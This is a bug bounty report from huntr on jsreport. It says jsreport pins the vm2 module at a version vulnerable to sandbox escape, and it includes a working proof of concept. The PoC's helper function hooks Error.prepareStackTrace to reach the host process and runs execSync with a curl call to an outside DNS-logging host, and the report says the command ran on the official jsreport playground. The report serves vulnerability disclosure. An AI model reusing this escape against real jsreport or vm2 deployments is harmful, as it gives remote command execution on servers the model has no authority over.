huntr report 397EA68D-1E28-44FF-B830-C8883D067D96 by m1dsummer
Apr 10, 2023 - 4:20 p.m.

An outdated dependency leads to a remote command execution vulnerability

2023-04-10 16:20:04
m1dsummer
www.huntr.dev
jsreport
vm2 module
outdated dependency
remote command execution
vulnerability
package.json
poc
sandbox escape
bug bounty

EPSS

0.017

Percentile

88.0%

Description

A few days ago a sandbox escape was found in the vm2 module for Node.js; it was officially fixed in v3.9.15.

However, jsreport pins vm2 to an exact version (3.9.11) in the package.json of its jsreport-core component, so a fresh install of jsreport never pulls in the patched vm2 release, no matter how recently it is installed.

The relevant details and PoC of this sandbox escape are publicly available:

Testing on the official jsreport playground confirms that the vulnerability is present there.

Proof of Concept

Tested on the official jsreport playground.
Playground workspace (with the PoC inside):
https://playground.jsreport.net/w/anon/f9agld17

The HTML template used to generate the PDF:

<style>
    th {
        font-size: 20px;
    }
    
    td, th {
        background-color: #abe81b;
        border: 3px solid #455bd0;
        padding: 10px;
        text-align: center;
    }
</style>
<table>
    <tr>
        <th>Name</th>
        <th>Age</th>
        <th>Job</th>
        <th>Random</th>
    </tr>
    {{#each people}}
        <tr>
            <td>{{name}}</td>
            <td>{{age}}</td>
            <td>{{job}}</td>
            <td>{{getRandom}}</td>
        </tr>
    {{/each}}
</table>

The helper JavaScript that the template calls while the PDF is rendered (it runs inside vm2):

function getRandom() {
    // Override the sandbox's stack-trace formatter. The call-site objects vm2 hands
    // to it are host objects, so their constructor chain reaches the host Function
    // constructor and from there the host process object.
    Error.prepareStackTrace = (e, frames) => {
        frames.constructor.constructor('return process')().mainModule.require('child_process').execSync('curl http://zf2o8e.dnslog.cn');
    };
    // Trigger an error whose stack vm2 formats with the hooked prepareStackTrace.
    (async () => {}).constructor('return process')();
    return Math.random();
}

Click the Run button.
In the report log on the right you can see that curl http://zf2o8e.dnslog.cn was executed on the server and that a DNS resolution error was thrown, which confirms the command ran outside the sandbox.
